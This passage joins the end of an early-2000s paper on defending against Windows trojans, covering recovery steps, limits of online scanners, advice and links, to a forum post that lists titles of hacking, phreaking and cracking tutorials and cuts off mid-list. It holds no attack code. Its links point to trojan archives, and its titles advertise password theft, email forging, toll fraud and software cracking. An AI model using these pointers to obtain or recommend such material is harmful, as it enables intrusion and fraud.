(Often attackers won't change any of your accounting data to fool you everything is OK so there is a big chance you will still be able to recover from the compromise). Change your web based e-mail passwords and do check your information stored there, as password retrieval services for various e-mail providers such as Yahoo and Hotmail use this info combined with a "Secret Question" for password retrieval. Attackers often change the info, the answer to the secret question and many other things that will get them easily back into your mailbox, whether you've changed your pass or not. - If you're taking advantage of the handy Address Book feature in your e-mail service, and have a list full of e-mails of friends, colleagues, etc. there is a real possibility that the attacker has sent them a trojan and possibly infected them too. Mail all of these people and ask them about receiving any files from your mailbox, inform them someone else might know your e-mail password so they'll be able to take appropriate actions like checking their machines for Trojans. Do the same with the people from your ICQ contact list as they might be targeted too. - Check your HDD for abnormal activities like a lot of free space missing etc. Search for warez software and, as I mentioned, kiddie-porn archives. - Think for a while about the sensitive information you had on your machine before the compromise, and if you are absolutely sure the attacker may know it too, then take appropriate action, like informing the any institutions the sensitive data belong to. - Scan your machine with Anti-Virus scanner, as the attacker could have placed some virus or infected macro documents on your machine to do destructive things even there's no access for him/her to your machine. - Monitor your processes BEFORE and AFTER connecting to the Internet, as some trojans start when they detect Internet connection. Don't get fooled again, be very suspicious. 17.Online Scanning Services ------------------------ These services are very popular these days and they are very handy for users who haven't got much knowledge on all of the holes they're checking for, but wanting to ensure they are protected from all of them. This section is placed at the end of the paper with a specific reason. If you have read the paper, you should know a LOT about trojans by now, their principles of working and detection techniques, therefore you can decide whether these online scanners are useful or if they give a false sense of safety. There are several types of Online Scanners: Trojan Scanner, Port Scanner and Bugs Checker. - Trojan Scanner It's using a list with predefined ports, associated with the name of the trojan responding to its default port, like Girl Friend=21544, and if this port is in "listening" state on your machine it will inform you that you've been infected with the GirlFriend Trojan. As you already know, trojans have functions like changing their default port to ANY of the attacker's choice. That makes these Trojan Scanners kind of useless, because serious attackers do change the default port for sure. - Port Scanner This service has two options like well-known ports scan and all ports scan. The first feature is scanning for well known ports, again associated with the appropriate service related to the port like port 21-FTP, 23-Telnet, 25-SMTP. The second feature is rarely seen on a free one, because of the bandwidth it would generate to scan all of the 65,535 ports. It will again associate ports with services like I mentioned above, and if it finds any unknown ports not associated with any service, it will also report it, like Port 34525 State:Listening, which means this port is waiting for connections from the outside. - Bugs Checker Its purpose is to check your Browser or your E-mail Software for well known bugs and security related problems. If any are detected, it will point you to a site containing the patches for these bugs or a site with the latest updated versions of the software. It's strongly recommended to close any other Internet related application on your machine before being scanned by Online Trojan Scanner and Port Scanner. You decide which service is best for you, which one will be able to detect trojan infections on your machine, and which won't; you now know the main principles and the answers too, I hope. Links to several online scanning services I know of are included in the Links Section. 18.Advice ------ This is a very useful section, full of tips and advice on how to protect yourself from trojans using various ways you've already read about, but summarised here for faster reading and hopefully better understanding. [01] Never accept a file even it is from some friend. You're never sure who's on the other side of the computer at the moment. If you really need this file, let's say some presentation or a work paper, find other ways, like the phone, and verify the file is from your friend. Yeah it will take you some time and slow you a bit, but be paranoid about attachments you may receive and don't get infected. [02] When executing files, first check their type. Is it really a .doc or it's some executable with a .doc icon. [03] Update your Anti-Virus and Anti-Trojan package signature files regularly, if possible EVERY day for maximal protection, as new trojans and viruses are discovered every day. Most of the detection software have functions like scheduling scans so if you are away from your machine during the night but you leave it switched on, why not consider to schedule a scan and update every night? Doing so will ensure your maximal protection. [04] Make sure you always have the latest version of the software you're using as new bugs appear very often and programs are regularly updated. Check often to see if there are bugs and/or other problems found in software that may potentially expose your system to risk - and patch/update your system(s) accordingly. Some software have an option to check for the latest version of the software from the vendor web site; make use of it. [05] Take several minutes and regularly check the processes on your machine with the software I reviewed above. You'll be surprised what you may detect sometimes. [06] It's vital to understand the risk of getting software from someone you just met, or had only several ICQ, IRC conversations with. [07] Consider freeware programs as very risky software to download, and try searching for some reviews of the program before running it. [08] Carefully read the help files coming with your detection software to be able to use them to their full capacity. [09] Download software ONLY from its official page(s) or dedicated mirror web site. Never get the latest version of mIRC or ICQ from some site you've never heard about like from some free web space provider like Geocities. Consider it as an untrusted site and do NOT download anything from there. [10] If you are playing with trojans you can also get infected as there are trojans or other software that are already infected and is waiting for someone with not so much knowledge on the topic to download and use it. [11] Don't be so naive on everything you see on the Internet or what various sites offer you - don't download some software you've never heard about. 19.Links Section ------------- This section will be very useful for everyone interested in reading various papers about trojans written by other people, anti-trojan software reviews sites, trojans archives, trojan protection portals and many other sites related to the topic. If you want me to add your link in the next update mail me and if the site is somehow related to the topic, I will definately include it in the list. Please don't forget that you can find these and many other security related links at our extensive web links directory at Frame4 Security Systems; check it out at: http://www.frame4.com/php/modules.php?name=Web_Links -- Trojan Portals and Archives -- URL : http://www.tlsecurity.net DESC : Excellent, well-known security portal providing many trojan resources and information regarding the topic URL : http://www.euyulio.org DESC : Security portal, huge trojans archive and other unique features URL : http://www.megasecurity.org/ DESC : Megasecurity portal having huge trojans archive and well sorted library on the subject URL : http://www.trojan.ch DESC : Trojans portal, news, archive, unique programs URL : http://www.trojanforge.net/ DESC : Trojans portal, trojans archive, documents, www-board URL : http://packetstormsecurity.org/trojans DESC : Packetstorm's trojans section URL : http://www.pcflank.com DESC : Security portal providing various functions as browser tests, remote trojan scanning URL : http://www.staff.uiuc.edu/~ehowes/trojans/tr-tests.htm DESC : Site showing results of actual (functional comparison) tests performed with various trojan detection programs -- Trojan Database Libraries -- URL : http://www.simovits.com/trojans/trojans.html DESC : Huge, detailed and well sorted list of trojans and their functions URL : http://www.tlsecurity.net/tlfaq.htm DESC : Comprehensive list and analysis of probably all the public trojans URL : http://www.blackcode.com/trojans/ DESC : Trojans/worms library database provided by BlackCode -- Anti Trojan Sites -- URL : http://www.hackfix.org/ DESC : Site with resources related to trojan protection and helping newbies URL : http://www.nohack.net/ DESC : The nohack project helps newbies clean their PCs and protect themselves URL : http://www.virushelp.info DESC : IRC channel related to virus and trojans protection URL : http://www.anti-trojan.org DESC : Anti-trojan help site -- Detection Software Reviews -- URL : http://www.wilders.org/anti_trojans.htm DESC : Site providing reviews of anti-trojan software URL : http://www.rokopsecurity.de/ DESC : German site providing reviews of various anti-virus and anti-trojan software, and many other information (site language is German) URL : http://www.fruitloop.net/virushelp/index.html DESC : Site providing reviews of detection software URL : http://www.firewallguide.com/anti-trojan.htm DESC : Site providing various security related services and reviews -- Papers Regarding Windows Trojans -- URL : http://www.jmu.edu/computing/info-security/engineering/issues/remote.shtml DESC : Interesting paper about windows trojans URL : http://members.ozemail.com.au/~netsafe/trojan_index.html DESC : Detailed information about windows trojans URL : http://researchweb.watson.ibm.com/antivirus/SciPapers/Whalley/inwVB99.html DESC : Windows trojans URL : http://researchweb.watson.ibm.com/antivirus/SciPapers/Smoke/smoke.html DESC : Another must read paper URL : http://www.frame4.com/content/files/the_gentle_art_of_trojan_horsing_under_windows.txt DESC : Windows trojans URL : http://www.frame4.com/content/files/trojdetecte.txt DESC : Snakebyte's tips about trojan detection URL : http://www.frame4.com/content/files/what_trojan.pdf DESC : Paper about windows trojans URL : http://www.frame4.com/content/files/Trojan_reversing.txt DESC : Interesting reading -- Online Scanners -- URL : http://www.hackerwhacker.com/ DESC : A must visit vulnerability checker with unique features URL : http://www.scannerx.com DESC : Vulnerability assessment scanner URL : http://scan.sygatetech.com/ DESC : Security scanner -- Browser and E-mail Software -- URL : http://www.nwnetworks.com/iesc.html DESC : Internet Explorer security centre URL : http://www.guninski.com DESC : Browser and active content researcher a must visit URL : http://www.sophos.com/virusinfo/whitepapers/activecontent.html DESC : Whitepaper about active content security -- Misc -- URL : http://directory.google.com/Top/Computers/Security/Anti_Virus/Trojans/ DESC : Google's trojans directory URL : http://support.microsoft.com/support/kb/articles/q262/6/31.asp?LN=EN-US&SD=gn&FR=0 DESC : Risky file extensions URL : http://www.frame4.com/content/files/razor.wintrinoo.txt DESC : Review of the WinTrinoo trojan URL : http://www.megasecurity.org/Info/mIRC.txt DESC : Very detailed paper on mIRC backdoors 20.Final Words ----------- I really hope you've realised how big security problem Windows Trojan Horses are, and you've become a little paranoid about your security. If you've ever found yourself infected, I also hope that while reading the paper, you have understood how you may have gotten infected the last time and I'm sure you won't make the same mistake again. The paper will be regularly updated with the latest info regarding the topic, as new variations of trojans and ways of infection appear very often. If you think I've missed something, please do not hesitate to contact me and contribute to it. Your feedback, ideas, comments, suggestions and everything related to the paper and the topic will be gratefully appreciated. I can be contacted at dancho.danchev@frame4.com. Part of the Frame4 Security Systems Publications Archive, this paper can be located at http://www.frame4.com/publications/index.php. Please visit the archive to get the latest updates to this paper and many other security related documents. ----------------------------------------------------------------This paper is a Frame4 Security Systems publication, all rights reserved. You may (re-)distribute the text as long as the content is not changed in any way and with this header text intact. If you want to serve this paper on your web site/FTP/Newsgroup/etc., I encourage you to do so but please do not change it in any way without the prior permission of the author. IMPORTANT -- THIS DOCUMENT IS FOR INFORMATIONAL PURPOSES ONLY. To the maximum extent permitted by applicable law, in no event shall Frame4 Security Systems be liable for any damages whatsoever, (including, without limitation, damages for loss of any business profits, business interruption, loss of any business information, or other pecuniary loss) arising out of the use, or inability to use any software, and/or procedures outlined in this document, even if Frame4 Security Systems has been advised of the possibility of such damage(s). There are NO warranties with regard to this information, but the paper may help you improve your Windows security a lot. This paper is the property of Frame4 Security Systems, all rights reserved. Copyright (c) 1999-2002 Frame4 Security Systems -- http://www.frame4.com…; Added by Paulhammer at 1:36pm on May 2, 2008

Topic: 200 Hacking Tutorials: arison Guide.txt 20 Great Google Secrets.txt 23 Ways To Speed WinXP, Not only Defrag.txt 250+ Tech books online.txt 2600 Hertz Single Tone Generator Schematic.txt 36 Graphics & Design Ebooks.txt 8 People Can Use The Same Msn Dial Up Account.txt A Basic Guide to the Internet.txt A Basic UNIX Overview.rtf A BEGINNERS GUIDE TO Hacking Unix.txt A Cracking Tutorial A Guide to Internet Security- Becoming an Uebercracker.txt A Guide to the Easiest Hacking there is.txt A List of every TeleNet code that there is.txt A List Of Government BBS Numbers.txt A List Of Some OF The Most Useful UNIX Hacking Commands.htm A Novice's Guide to Hacking 2004.txt A Novice's Guide To Hacking.txt A Short HACKER SPEAK Glossary.txt A simple TCP spoofing attack.txt A Small Guide to Hacking HOTMAIL.txt A UNIX Hacking Tutorial.txt A very small tut for RealMedia.txt A Web Standards Checklist, How to make a proper website.txt Accessing the bindery files directly.txt Accessing The Entire Internet On Your 3 Phone, U8110, E616 etc..txt Advanced Shellcoding Techniques.txt All about ftp must read.txt All About Movie Tags (what Is A Dvdrip, Cam Etc.).txt ALL About Spyware.txt All mIRC Commands.txt Almost Everything You Ever Wanted To Know About Security (but.txt An Architectural Overview of UNIX Network Security.htm An Extensive Guide to Bell System Man Holes.txt An Indepth Guide in Hacking UNIX and the concept of Basic Net.txt An Introduction into TeleScan.txt An Introduction to Denial of Service.txt An Introduction to the Computer Underground.txt An Introductory Guide To TeleNet Commands.txt Anarchist Cookbook 2004 Anonymity complete GUIDE.rtf Anonymity of Proxy, Anonymity Of Proxy learn it insideout.txt Anonymity.txt ANONYMOUS emails.txt Anonymous FTP FAQ.htm ANSIBombs II Tips And Techniques.txt anti leech hacking tutorial.txt Area Codes and Time Zones.txt attacks on networks how to stop.htm Auto End Tasks to Enable a Proper Shutdown, Win XP Tweak.txt Automatic Windows Installation, No keypress required!.txt B.A. regedit.txt Backdoor.txt Backdoors.txt Backtracking EMAIL Messages.txt Bandwidth Explained!.txt Basic Networking.txt BBS CRASHING TECHNIQUES.txt Becoming A Phreaker - The Quick n' Easy Way.txt Beep Code Manual.txt Beep Codes Error Codes.txt Bell Hell Volume #1.txt Bell Hell Volume #2.txt Best Keyboard Shortcuts.txt Big Brother And Ndisuio.sys, A new Internet phenomenon.txt Bin & Cue Simple Tut.txt BIOS Update Procedure.txt Bit Torrent Tutorials.txt Block Adservers.txt Boot Block Recovery For Free.txt Boot Winxp Fast.txt Border And Text Effects In Psp8, For use with PSP8.txt Breaker B0X.txt Broken Ie, How to fix it.txt BRUTE- A brute force approach to hacking Unix passwords.txt Bulk Editing Of .xxx to .zip or .mp3.txt BulletProof FTP Server Tutorial.txt Burn .bin file Without A .cue file.txt Burn a BIN without a CUE using NERO.txt Burning Bin & Cue Using Nero.txt Bust Avoidance For Dipshits.txt busybox.txt Bypass Internet Censorship.txt Calculating Offsets.txt cannot use my password to get back into Windows XP.txt Cant See Secure Sites.txt Caught A Virus.txt Cellular Listening with a TV .txt Cellular Telephone Phreaking Phile Series VOL 1.txt Change Music In The Malibu And The Pole Position, GTA Vice Modders.txt Change Text on XP Start Button.rtf Change Text on XP Start Button.txt Change The Default Location For Installing Apps.txt Change The Storage Location Of 'my Documents', a bit safer for when your PC crashes....txt Change Your Ip In Less Then 1 Minute.txt Changing Default Location For Installing Apps.txt Check For Dos, Check to see if you are infected..txt Choosing A Good Domain Name, ya..good name is important!.txt Choosing An Internet Merchant Account, nice info on Internet Merchant Account...txt Clear Unwanted Items From Add And Remove.txt Closing Open Holes, System Security How to close open holes.txt Closing the Net.txt CMD Prompt here, add to folder context menu windows xp.txt COMMON FTP ERROR CODES.txt Compression and Cracks for Dummies.txt Computer Acronyms.txt Computer Bulliten Boards and the Law.txt Computer Chrime - Current Practices, Problems and Proposed So.txt Computer eMail and Privacy.txt Computer Hackers News Articles.txt Computer Matinence.txt Computer Rights vs First and Forth Amentment Right.txt Computer Security.txt Computer Security_2.txt Computer Viruii.txt Computerized Governmental Database Systems Containing Persona.txt Configuring ZoneAlarm Pro Security Settings, A ZoneAlarm Pro Tutorial.txt connect A Psx Pad To Pc, Warning soldering is involved...txt Convert Stubborn Webpage To pdf.txt Convert To Basic And Dynamic Disks In Windows Xp.txt Converting Movies To Psp Format.txt Converting to NTFS.txt COPS and Robbers-Unix System Security.txt COPY X BOX GAMES!.txt Copyright Guides for Photographers.txt Cracking Bios, use the followin' code.txt Cracking Zip Password Files.txt Crap Software Config Settings, How to set-up the firewall.txt Crash Course in X Windows Security.txt Create A Huge File.txt Create A Personal Screen Saver In Win Xp!.txt Create An Ftp Server On Your Pc With Serv-u.txt Create Bootable Win XP SP1 CD(nero).txt Create Bootable XP SP integrated CD.txt Create One-click Shutdown And Reboot Shortcuts.txt Creating a Board aka Forum on your own PC !.rtf Creating Universal Ghost Usb Boot Disk And Cd.txt Crime and Puzzlement.txt Cultural Formations in Text-Based Virtual Realties.txt Cyberspace and the Legal Matrix- Laws or Confusion.txt Dark Angel's Phunky Virus Writing Guide .txt Data Capacity of CDs [Tutorial].txt Debug, Learn how crack windows.txt Defamation Liability of Computerized Bulliten Board Operators.txt Delete An undeletable File.txt Delete Files From The Recent File List In Windows.txt Dept of Treasury Letter.txt Digital Camera Guide.txt Digital Faq -learn Everything About Digital, Capture, Edit and Burning and more.txt Digital Photo Id Cards, Greate Info.txt Direct Link To Any Page You Want To In Hotmail.txt Directx Explained.txt Disable Compression On Xp, NTFS partition, Disk Cleanup.txt Disable The Send Error Report, to Mcft.txt Disable Windows Logo Key.txt Discover New Music You'll Probably Love.txt Do You Want To Learn Maya 6, look, some tutorials.txt Doom 3 Speed Up, Guaranteed 40% better.txt Doom3 Simple Tweeks, how to run doom with tweeks.txt Dos User - No Boot Dos Disk, No Edit.com,How to create Imp Files.txt Download Free Music legally,, legally.txt Download from a paypal site without paying a penny!.txt Download From Ftpz, Using Ftp Search Sitez.txt Download Mp3's Without Using Filesharing.txt Download Music And Video With ,edia Player9, quick and easy!.txt Download Timeframes.txt Downloading Files, Using Archives And Images.txt Downloading Windows Media Streams.txt Drake's Phreaking Tutorial.txt Dreamweaver Tut That Teaches U, to search a database with phpmysql.txt Driverguide.com.txt Dual Boot After The Fact.txt Dvd Copying-ripping Definitions.txt DVD Regions Information.txt Dvd-9 to Dvd+r Dl, Double Layer To Double Layer, 1-1 copies.txt Easily Disconnect-reconnect From Broadband.txt Easily Find Serial Numbers On Google.., easy to do and works like a charm..txt Ebay Hackcracktip.txt Electronic Bulliten Boards and 'Public Goods' Explainations o.txt Electropolos - Communication and Comunity on IRC.txt Eliminate Ie's Autocomplete Reminder.txt Email Forge, sends email from anyone.txt Enable Folder and Icon Refresh, Win XP Tweak.txt Erasing_Your_Presence_From_System_Logs.txt Ethload User's Guide.txt Evolution Of Computer Viruses History Of Viruses.txt Excellent tricks and techniques of Google Hacks.txt Exploseek, a simple tool to find music on the net.txt Find Stuff.txt Finding Missing Files From A Release.txt Firefox Speed Tweaks.txt Firefox Tweaks.txt Firewall Protection how to.rtf FlashFXP FAQ.txt Flashget Broadband Tweak.txt FLASHGET INTEGRATION IN OPERA,MOZILLA,NETSCAPE.txt FlashGet v1.4 - More Download Simultaneously.txt Flashing A Video Card Bios [advanced Guide], Step-by-Step Guide for Novice and Expert.txt Formatting An Hdd, when fdisk won't.txt Formulating A Company Policy on Access to and Use and Disclos.txt Free Access To Websites Without Registering.txt FREE Hosting For WAREZ.txt FREE Hosting List php, mysql and more.txt Free Speech in Cyberspace.txt Free World Dialup.txt Free X-box Live !.txt Freebsd Install Guide.txt Gender Issues in Online Communications.txt General Keyboard Shortcuts, General Keyboard Shortcuts.txt Get In Windows 2000 As Administrator.txt Get the Most Out of Your DVD Recorder.txt Get The Music You Want To Hear.txt Get unlimited bandwidth from your host for free.txt Getting A 1gb Yahoo China Account.txt Getting Counter-strike Source To Work.txt getting movies, mp3,games using google.txt Getting older programs to run on Windows XP.txt Getting started with Linux for nOObs!.txt Go to Windows updates anonymously.txt Google Crack Search.txt Google secrets.txt Google Tips & Tricks, (utilizing search engine).txt Government Computer Security Techniques.txt Graffiti On Walls 4 Adobe Photoshop Cs 8.0.txt Guide For Getting Free Stuff.txt Guide to Hacking with sub7.doc Guide to IIS Exploitation.txt Guide to Slipstreaming Service Pack 2.txt HACKDICT.TXT Hacker Test.txt Hackers A-Z.TXT Hackers Who Break into Computer Systems.txt hacking and phreaking.doc Hacking Bank Of America's Home Banking System.txt Hacking Compuserve Infomation Service.txt Hacking Faq.txt Hacking for Dummies Volume 2.doc Hacking For Newbies.doc Hacking GTE Telemail.txt hacking in telnet ftp.rtf Hacking IRC - The Definitive Guide.txt hacking on Telnet explained.doc hacking on XP part 1.doc hacking on XP part 2.doc hacking on XP part 3.doc hacking on XP part 4.doc hacking on XP part 5.doc hacking password protected site.doc Hacking Password Protected Website's.doc hacking passwords.doc Hacking PC-Pursuit Codes.txt Hacking Techniques.txt Hacking TRW.txt Hacking TYMNET.txt Hacking Unix System V's.txt Hacking VoiceMail Systems.txt Hacking Wal-Mart Computers.txt Hacking Webpages.txt Hard drive Gone Bad.txt Hardware Firewall.txt Have Notepad In Send To.txt have satallite tv for almost free IF not free!!!.txt Hex, How to turn binary or decimal to hex.txt Hide Drives and Partitions.txt How 2 Find EVERYTHING uploaded on Rapidshare.txt How BT phone cards works.txt How do I overburn a CD with Nero.txt How do I remove an extra operating system from by.txt How do I Test My VirusScan Installation.txt How Do U See Hidden Files, Using DOS...txt How Download MP3s from Fanscape.com or other Streaming Audio-Video.txt How Linux boots.txt How Long Has Your XP System Been Running.txt How Phone Phreaks are Caught.txt How the Traditional Media Clasifications Fail to Protect in t.txt How To Access Your Folders From Your Taskbar.txt How To Add A Url Address Bar To The Taskbar.txt How To Add An Option To Print, the Contents of a Folder!.txt How To Add Your Own Windows Tips.txt How to Back Up the Registry.txt How To Backup Ps2 Games.txt How to Bill All Of your Fone Calls To Some Poor, Unsuspecting.txt HOW TO BLOCK PEOPLE ON WINMX WHO SHARE NOTHING.txt How To Block Websties Without Software, block websites.txt How To Boot Xp Faster (updated).txt How to build a black box.txt how to burn quicker in windows xp.txt How to Bypass BIOS Passwords.txt How To Bypass Web Filters, tutorial.txt HOW TO CAPTURE STREAMING MEDIA.txt How To Change A Cmos Battery.txt How to change the serial number used in Windows XP, Valid for XP Corporate.txt How To Change Thumbnail Size And Quality.txt How to clear Bios info 2.txt How to clear Bios info.txt How To Convert File System, fat - fat32 to ntfs.txt How To Copy A Dvd Which Will Play On A X Box.txt How to copy songs from your iPod to your PC.txt How to crash AOL.txt How To Customise Your start Button.txt How To Delete Those Persistent Nasty Files.txt How to dial out of a UNIX System.txt How To Directly Go To Inbox, Write Msg, w Hotmail, no need for hotmail today - http users.txt How To Disable Picture And Fax Viewer.txt How to do a high Quality DivX rip.txt How To Download Bittorrent Files.txt How To Download Directly From Crackdb.com.txt How To Download Movies, From IRC.txt How to Download-Upload Files from email.txt how to edit right click menu.rtf how to execute chm files in linux.txt How to Extend the life of the yousendit download links.txt How to find a remote IP.txt How To Find Ftp's The Easy Way'.txt How to find MP3's real quickly.txt How to find Security Holes.txt How To Find Serial Numbers On Google.txt How to fix corrupted files in XP.txt How to fix Windows Installer problem.txt How To Get A Free I-pod Or Flat Screen Tv, check it out.txt How to get a Shell in 24 hours.txt HOW TO GET ANY WINDOWS PASSWORD.txt How to Get someones ISP password, Get free internet.txt How To Get Top Ranking, Search Engines.txt How to Hack UNIX System V.txt How To Hack Windows Xp Admin Passwords.txt How to hack-change your Windows XP Boot Screen.txt how To Hide Yourself From Network Users!, And give access to only specific users!.txt How To Increase Download Speeds By 100-200 Kbsec.txt How to Install and run Windows CE on your USB Stick.txt How to learn to hack in easy steps.doc How to login to a C.B.I. System.txt How To Make 5cds, 10cds Or 2dvds From Official Dow, These are same as Mandrake PowerPack+.txt How to make a Free Phone Call.txt How To Make A Kvcd.txt how to make a new web site.txt How To Make A Transparent Background, .fla .swf.txt how to make a VCD from a DivX.txt How To Make An Animted Logo.txt How To Make Free Phone Calls.txt How to make key generators.txt How To Make Perfect Copies Of Maxis The Sims Discs, CloneCD Style!.txt How To Make XP Go Faster.txt How To make your own Radio Station 2.txt How To Make Your Own Radio Station.txt How To Make Your Own Radiostation.txt HOW TO MANUAL - THE END OF DELETERS.txt How to modify exe files.txt How To Move Xp Harddrive To New Motherboard.txt How To optimize DSL-CABLE connection speed.txt How To Play Movies (divx Etc) With Subs.txt How to Put an End to Unwanted or Harassing Phone Calls.HAR How to recover MOST of scratched CD data discs.txt How to Remove DRM Protection for Video Files.txt How To Remove Ms Java Vm And Install Sun Java.txt How To Remove Signin Details Of Msn Passport.txt How To Remove The Default Admin$ Shares.txt How to remove the Links folder in IE Favorites.txt How to Remove WinXP Splash and See Operations.txt How To Rename Extensions With Ease, with a Renamer.bat file!.txt How to Rename File Extensions.txt How To Rename Multiple Files In Winxp.txt How To Restrict Login Hours Allowed.txt How to safeguard your files when computer crashes.txt How to save Windows xp updates.txt how to search google for RAPIDSHARE links.txt How To See Hidden Files, Using Dos.txt How to send ICQ Bombs.txt How To Set search For All Files In Winxp.txt How to set up a http server running from you computer.txt How To Set Up A Proxy In Flashget, As Requested.txt How to set up a server with Apache , PHP , MySQL , Perl , phpMyAdmin.txt How To Set Up Direct Connect.txt HOW TO SET UP FTP SERVER.txt How To Set Up Proxies In Your Browser.txt How To Set Zone Alarm Settings!, Fix for ZA ports.txt How To Setup Your Own Dns (Domain Name Server).txt How To Speed Up A Slow Computer.txt How To Speed Up Http Requests On Internet Explorer, as above.txt How To Stop Spam.txt How to swear in all languages.txt How To Unload Cached Dll Files To Free Memory.txt How to Use and How to Chain Multiple Proxies!.txt How To Use File Compression In Windows Xp.txt How To Use Google To Download Mp3's, and applications.....txt How To Use Newsgroups.txt How to use the Web to look up information on hacking.doc How To Use You Gmail With Msn Messenger.txt How-to Get Videos And Dvds Onto Your Sony PlayStation Portable (PSP) for free.txt HOWTO Change Windows XP Home to Windows XP Pro.txt Important Faqs For Sp2.txt Improve Doom 3's Performances!!, simple but efficient trick for every1.txt Improve your dialup modem preformance.txt Increase XP Folder Settings.txt Information of Hacking AngelFire Websites.txt Insert Your Serial For Office 2k, auto install office.txt Install A New Hard-disk.txt Install Xp From Dos.txt Installing Apache on Windows.txt Installing Gentoo Linux, Amazing step by step tutoria.txt Installing IIS On Windows Xp Pro.txt Installing Slackware Linux.txt Instructions For Removal Of Advertising In Msn Messenger.txt Introduction to Denail of Service.txt Ip Address Structure, Expilinatin OF IP Address {A short way}.txt IP addressing, and gaining IP's.txt IP Addressing.txt IP how to.rtf Irc How To Downlaod From, How to downlaod from IRC.txt Irc Servers On nix, For people who want to start own IRC net.txt ISSN Numbers- An Introduction.txt Junk Mail- How Did They All Get My Address.txt Keep Files Private.txt Keep Folders Hidden.txt Keyboard Shortcuts Result in Excel 2000 - Movement.txt Keyboard Shortcuts, Mcft Word.txt Keyboard Shortcuts, must read.txt Kill Mcft Instant Messenger.txt Lamination Tips, Its a Fast TUT......txt Leet Way To Get Your Ip In Windows Xp.txt LENROS~1.TXT LENROS~2.TXT Linking Your Xbox To Your Computer.txt Linux Howto's.txt List Of Sites Not To Go To.txt Little help for anonymous mailer.txt Lots Of Windows Xp Tips, Take A Look !.txt Lyrics With Google.txt Make A Autorun File For Ur Cd.txt Make A Batch File To Clean UR PC!!, All In One!!.txt Make A Roughly 16 Hour Video Dvd.txt Make Acrobat Reader 6 load faster.txt Make Dvd Iso From Suse 9.2 5 Cds Iso, Linux mode and Windows mode ISO creation.txt Make Mp3 Files Smaller Without Losing Quality.txt Make Your Own Ringtones For Mobile Phone, also logos, wallpaper, etc.txt Make Your Pc Faster, Guaranteed.txt MakeXPgoFaster.txt making a .cue file, in notepad.txt Making A .txt Executable Server.txt Making Bootable Floppy Disk to Boot into Windows.txt Making Cd Version Of Doom3 Into Dvd Version.txt Making Web Page Fonts Consistent and Uniform.txt Manage Saved Ie Passwords.txt Mastering The Windows XP Registry.txt Maximize Dial-up Modem Settings.txt MEMETICS.TXT Mcft's Really Hidden Files, Reveled Hidden files.txt MINDVOX.TXT mIRC Not Just Another Chat Client, Download Anything You Want Almost.txt mIRCcommands.txt Misc Linux Tips & Tricks.txt Missing Administrator Account.txt Mobile Secret Codes.txt Modify .exe Files And Crack A Program.txt More Xp Tips and tricks make your computer more faster.txt MORRIS~1.TXT Moving and Removing the Start Button.txt Msn Messenger & Gmail.txt My Flash Bookmarks, long list of tutorials.txt Myth about WPA ( How it is done ), Windows Product Activation Technique.txt NEIDOR~1.TXT Nero How To Verify The Validity Of The Sn U Use.txt NetBios explained.doc New Pc Or New Motherboard.txt New Way To Relive Some Zinio File.txt news groups the how to do.txt NFS Tracing.txt Nice list of windows shortcuts.txt Nightline- FBI,Privacy,and Proposed Wire-Tapping Legislation.txt No Text Icons.txt Ntfs Cluster Size, better harddrive performance.txt NY_2'S Guide to Obtaining An IP Address. .doc Official Unattended Xp Cd Guide Xp Sp2 @ Msfn.org.txt Open Windows Explorer To A Different Default Direc.txt Optimize Broadband & Dsl Connections.txt Optimize Emule Connection.txt Organizational Analysis in Computer Science.txt Outpost Rules, Outpost rules for system & app.txt Outsmarting System File Protection.txt Overclocking_Tutorial.txt Packet Attacks - Version 1.1, { Packet_Attack_Exlained}.txt Part 0 Dc++.txt Part 1 Bittorrents.txt Part 2 Irc (mirc).txt Part 3 Ftp.txt Partitioning Your Harddisk With Fdisk.txt Pc File Extention Listing.txt Pc Maintenance Guide.txt Peer2mail Tutorial.txt Performance Increase Through My Computer.txt PGP Startup Guide.htm Phone Systems Tutorial by The Jolly Roger.txt Phreakers Handbook.txt Play Games On PS2 Without ModChip.txt Play On A Bnet Emulator, and f off cd key check =).txt Port Numbers.txt Presumed Guilty.txt Problem With Internet Navigation, Clean Host File.txt Proxy how to.rtf Quick Fix For Spyware, Try This Before Doing Surgery on Your OS.txt Quick Msc.txt Quick Phone Modifications.txt Quick Shutdown for XP, How to create a shutdown shortcut..txt Quickly Start The Shared Folder Wizard.txt Raising Hell with Unix.txt Rapidshare hack!!!!! Free premium acount for all.txt Rapidshare Hacked, unlimited upload, no countdown.txt Rapidshare Timelimit.txt Read This! Av Compare!.txt Recover A Corrupted System File.txt Recover a Quick erased CD RW.txt Reformat&Reinstall.txt Regedit.exe & Regedt32.exe, Whats the difference.txt Registry Disassembled a basic tutorial.txt Reinstall Internet Explorer 6.txt Release Codes, Read, and Learn....txt Remarks of the President and Vice President to Silicon Valley.txt Remote Desktop Through Company Firewall.txt Remote Shutdown.txt Remove Linux From Your Pc Safely, ...and restoring your MBR.txt Remove Msn Messenger From Xp, several ways...txt Removing Banners From Free Webhosts.txt Removing Norton Anti-virus 2004, How to remove the Registry Enteries.txt Rename 'recycle Bin' To Whatever You Want.txt Reregister All .dll Files Within Registry.txt Reset your lost Bios Password.txt Restore JPG,JPEG,JPE Default File associations, Win XP Tweak.txt REVERSE CODING.txt RIGGSB~1.TXT RIGGS_~1.TXT RIGHTS~1.TXT RIVERA.TXT Routing Basics.pdf Run Aol Without Using Aol Browser & Save Resources, connect permanently and use any browser.txt Running A Board forum From Your Own Pc.txt Running Vanishing Console Programs With A Click!, Ever had a console program that vanis....txt Safely Editing the Registry....txt Save Your Desktop Icon Settings.txt Saving and loading Photoshop actions.txt Scheduled Tasks - Defrag, how to set up scheduled defrags.txt ScreenLock Professional v2.0.41.txt SEARCH eBOOK in FTP SEARCH ENGINE.txt Search For Ebook Server With Google.com.txt Search like a real warez d00dz, for warez of course!.txt Searching For Something To Download, This may help.txt Secret Backdoor To Many Websites.txt Secrets Of Lock Picking.txt Securing WinXP Pro (with what win-xp has to offer.txt Securing your WINDOWS XP computer.txt Security holes.txt Seisure Warrent Documents for Ripco BBS.txt Set Google as your Default Search in IE.txt Set Win Explorer to open the folder you want!, Little trick.txt sick of inserting winxp cd every time your pc asks, Change Default Location of i386 Folder.txt sidebar fix.txt Simple Tweaks For Peak Pc Graphics Performance.txt Single Click Shutdown.txt Single-click To Open An Item..., IF the Folder Options is grayed out.txt Site Security Handbook.txt SJ-DEC~1.TXT SJ-RESP.TXT Slow Loggon Time, one fix for problem.txt Slow Opening Of File Dialogs.txt SMTP-Simple Mail Transfer Protocol.txt Some Cool Site For Tutorials.txt Some Google Tricks, again.txt Some More Tips To Improve Your Winxp.txt Sp2 For Xp Slipstream, Integrate SP2 into your 